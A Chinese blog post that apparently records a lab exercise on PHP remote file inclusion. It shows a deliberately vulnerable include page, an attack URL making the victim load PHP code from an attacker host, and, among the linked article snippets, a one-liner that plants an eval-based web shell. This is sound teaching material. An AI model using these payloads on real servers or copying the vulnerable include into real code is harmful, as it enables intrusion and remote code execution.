远程文件包含漏洞

已于 2023-11-20 22:23:48 修改
阅读量397 收藏
点赞数
分类专栏: # 文件包含 文章标签: 安全 web安全 笔记 网络安全 xss
于 2023-11-20 21:28:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134519275
版权

环境

  • Server2016(受害者)

    • ip:10.9.47.173

    • 配置 php.ini

      allow_url_fopen = On/Off # 通过远程方式打开文件
allow_url_include = On/Off # 通过远程方式包含文件

    • 文件包含页面

      <?php
$file=@$_GET['filepath'];
@include $file;
?>

  • 攻击者机器 1

    ip:10.9.47.90

    开启 http 服务供受害者访问

    提供被远程包含的文件(1.php)

    <?php phpinfo();?>

  • 攻击者机器 2 kali

过程

攻击者机器 1 开启 phpstudy,www 目录下放 1.php 文件,保证与受害者的网络连接,受害者可以访问 1.php

image-20231120211045676

kali 访问以下 url,成功访问到文件

http://10.9.47.173/include.php?filepath=http://10.9.47.90/1.php

image-20231120211551725

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
文件包含漏洞详解
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
WEB安全文件包含漏洞(1)
最新发布
2301_81685556的博客
06-21 1125
WEB安全文件包含漏洞
Web安全领域的探索之远程文件包含漏洞(LFI)
程序员阿飘 的博客
02-19 508
文件包含渗透。
信息安全技术:远程文件包含漏洞.pptx
11-01
【信息安全技术:远程文件包含漏洞远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非...
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
PHP漏洞挖掘之旅——远程文件包含漏洞
kendyhj9999的专栏
05-25 3710
PHP漏洞挖掘之旅——远程文件包含漏洞 2011, April 21, 8:31 AM. PHP学习 Submitted by admin  本篇文章源自《黑客防线》2007年5月刊 转载请注明版权 作者:cnbird[H.U.C]河北泊头杨宁 ===================================   大家好,我是cnbird[H.U.
文件包含漏洞
热门推荐
selecthch的博客
06-11 1万+
1、文件包含漏洞简介 1、1什么是文件包含          程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 ...
36、远程文件包含漏洞
weixin_41489908的博客
02-07 440
环境:DVWA,low级别 1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128 将yc.jpg照片拖入edjpgcom软件,添加下面这句话 <?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?> 2、访问一下该图片:http://192.168.152.128/yc.jpg 3...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2475
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2184
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
1.文件包含漏洞
qq_51478862的博客
11-19 750
一,什么是文件包含漏洞 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 例如: <php require $_GET['filename'];?php> 总结:要想成功利用文件包含漏洞,需要满足两个条件 1,要有文件包含函数并且通过动态变量的方式引入需要包含的文件 2,用户能够控制该动态变量 php中常
文件包含漏洞02】文件包含漏洞原理及本地远程两种攻击方式
Fighting_hawk的博客
03-10 4904
1. 理解文件包含漏洞产生的原因; 2. 掌握本地与远程利用漏洞的方式。
远程包含和本地包含漏洞的原理
weixin_33933118的博客
08-20 140
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包 含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个 恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。 一、涉及到的危险函数〔include(),requi...
为什莫远程文件包含漏洞危害更大
05-10
远程文件包含漏洞危害更大是因为攻击者可以通过远程文件包含漏洞,将自己服务器上的恶意文件下载到被攻击者的服务器上,从而实现对被攻击者服务器的控制。攻击者可以利用这个漏洞来执行任意代码,包括但不限于窃取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值